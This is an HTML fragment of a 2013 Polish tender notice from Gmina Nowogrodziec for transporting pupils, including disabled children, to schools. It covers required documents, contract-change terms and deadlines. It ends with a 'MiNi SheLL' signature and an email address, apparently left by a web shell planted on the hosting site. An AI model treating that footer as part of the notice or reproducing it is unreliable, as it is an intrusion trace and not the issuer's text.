<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku
do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku nastąpienia
co najmniej jednej z okoliczności wymienionych poniżej:
 - zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron;
- powstaniu rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności 
i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony;
 - gdy zaistnieje potrzeba wydzielenia dodatkowej trasy przejazdu lub zakupu biletu na trasie przejazdu nie uwzględnionej w SIWZ - dla zadania nr 1;

- gdy zaistnieje potrzeba wydzielenia dodatkowej trasy przejazdu, spowodowana wzrostem liczby uczniów (np. w sytuacji, gdy w trakcie roku szkolnego Gmina uzyska informację 
z PZSiPS w Bolesławcu o przyjęciu do placówki kolejnego ucznia, posiadającego orzeczenie o niepełnosprawności oraz orzeczenie o potrzebie kształcenia specjalnego) - dla zadania nr 2; 
- gdy zaistnieje konieczność wprowadzania zmian w przebiegu i kilometrażu  trasy oraz godzin odjazdu z poszczególnych przystanków w zależności od liczby osób korzystających 
z dowozu, spowodowanych np. chorobą ucznia, rezygnacją rodzica z takiej formy dowozu dziecka, itp. - dla zadania nr 2;

- gdy zaistnieje inna niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy.

Powyższe zmiany postanowień zawartej umowy wymagają zgody Zamawiającego i jednocześnie nie stanowią zobowiązania do wyrażenia takiej zgody. Strona występująca z propozycją zmiany umowy zobowiązana jest do sporządzenia i uzasadnienia wniosku o taką zmianę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.nowogrodziec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Obsługi Szkół w Nowogrodźcu, ul. Adama Asnyka 53/1, 59-730 Nowogrodziec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2013 godzina 10:50, miejsce: Zakład Obsługi Szkół w Nowogrodźcu, ul. Adama Asnyka 53/1, 59-730 Nowogrodziec (budynek Miejsko Gminnego Ośrodka Pomocy Społecznej, wejście od tyłu od strony parkingu).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - Dowóz uczniów do szkół podstawowych i gimnazjów z terenu Gminy Nowogrodziec.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dowóz uczniów do szkół podstawowych i gimnazjów z terenu Gminy Nowogrodziec w dni robocze z wyjątkiem sobót, świąt i innych dni ustawowo wolnych od pracy, także przerw w realizacji zajęć dydaktyczno - wychowawczych, określonych  na podstawie przepisów rozporządzenia Ministra Edukacji Narodowej i Sportu z dnia 18 kwietnia 2002 roku w sprawie organizacji roku szkolnego (Dz. U. z 2002 r., Nr 46, poz. 432 ze zm.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dowóz uczniów do Powiatowego Zespołu Szkół i Placówek Specjalnych w Bolesławcu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dowóz dzieci niepełnosprawnych umysłowo i ruchowo (1 osoba na wózku inwalidzkim) wraz z zapewnieniem opieki z miejsca zamieszkania do Powiatowego Zespołu Szkół i Placówek Specjalnych w Bolesławcu, ul. Zgorzelecka z następujących miejscowości:
1) Wykroty - 1 osoba;
2) Czerna - 1 osoba;
3) Parzyce - 2 osoby;
4) Nowogrodziec - 5 osób (w tym jedna osoba na wózku inwalidzkim);
5) Milików - 2 osoby..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.34.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com